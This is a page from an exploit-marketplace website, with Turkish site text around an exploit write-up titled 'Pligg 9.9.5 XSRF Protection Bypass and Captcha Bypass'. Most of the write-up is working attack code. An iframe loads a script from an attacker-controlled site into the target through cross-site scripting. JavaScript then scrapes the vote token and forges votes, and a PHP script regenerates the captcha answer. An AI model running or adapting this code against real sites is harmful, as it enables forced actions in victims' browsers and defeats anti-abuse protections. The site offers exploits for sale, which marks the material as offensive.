0day.today - Dunyanin En Buyuk Exploit Veritabani
![](/img/logo_green.jpg)
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Oku [ anlasma ]
- Oku [ Gonder ] kurallar
- Ziyaret et [ SSS ] page
- [ Uye Ol ] profil
- [ FIYAT ]
- Eger istiyorsaniz [ satmak ]
- Eger istiyorsaniz [ almak ]
- Eger kaybederseniz [ Hesap ]
- Herhangi bir sorunuz [ [email protected] ]
- Yetkili sayfa
- Uyelik sayfasi
- Hesap sayfasini geri yukle
- SSS sayfasi
- Iletisim sayfasi
- Paylasim kurallari
- Anlasma sayfasi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bize ulasabilirsiniz:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Pligg 9.9.5 XSRF Protection Bypass and Captcha Bypass
===================================================== Pligg 9.9.5 XSRF Protection Bypass and Captcha Bypass ===================================================== Written By Michael Brooks Pligg - XSRF Protection Bypass and Captcha Bypass affects 9.9.5 XSRF Protection Bypass <html> <!-- Remove this iframe from this file and place it on a site that you want to force people to vote for. Change these pligg_story_to_vote_for, target_pligg_site and site_you_control . --> <iframe src='http://target_pligg_site/index.php?category="><script src=http://site_you_control/pligg_auto_voter.html type=text/javascript></script>' width="0%" height="0%"></iframe> </html> var pligg_story_to_vote_for="/story.php?title=pligg_xss"; function r(){ var Z=false; if(window.XMLHttpRequest){ try{ Z=new XMLHttpRequest() }catch(e){Z=false} }else if(window.ActiveXObject){ try{ Z=new ActiveXObject('Msxml2.XMLHTTP') }catch(e){ try{ Z=new ActiveXObject('Microsoft.XMLHTTP') }catch(e){Z=false} } } return Z } var x=r(); x.open("GET",pligg_story_to_vote_for,true); x.onreadystatechange = function() { if (x.readyState == 4) { var v=x.responseText.split("javascript:vote("); v=v[1].split(")"); v=v[0].split(","); var p="id="+v[1]+"&user="+v[0]+"&md5="+v[3].substring(1,33)+"&value="+v[4]; var y=r(); y.open("POST","/vote.php",true); y.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); y.setRequestHeader("Content-length", p.length); y.setRequestHeader("Connection", "close"); y.send(p); } } x.send(''); Captcha bypass. The link to the capthca image will look something like this: http://127.0.0.1/Pligg_Beta_9.9.0/ts_image.php?ts_random=54771854 To obtain the clear text, send that ts_random value to the captcha_bypass.php with the same web browser: http://127.0.0.1/captcha_bypass.php?ts_random=54771854 captcha_bypass.php: <?php $sitekey=82397834; $ts_random=$_REQUEST['ts_random']; $datekey = date("F j"); $rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey)); print substr($rcode, 2, 6); ?> # 0day.today [2024-07-02] #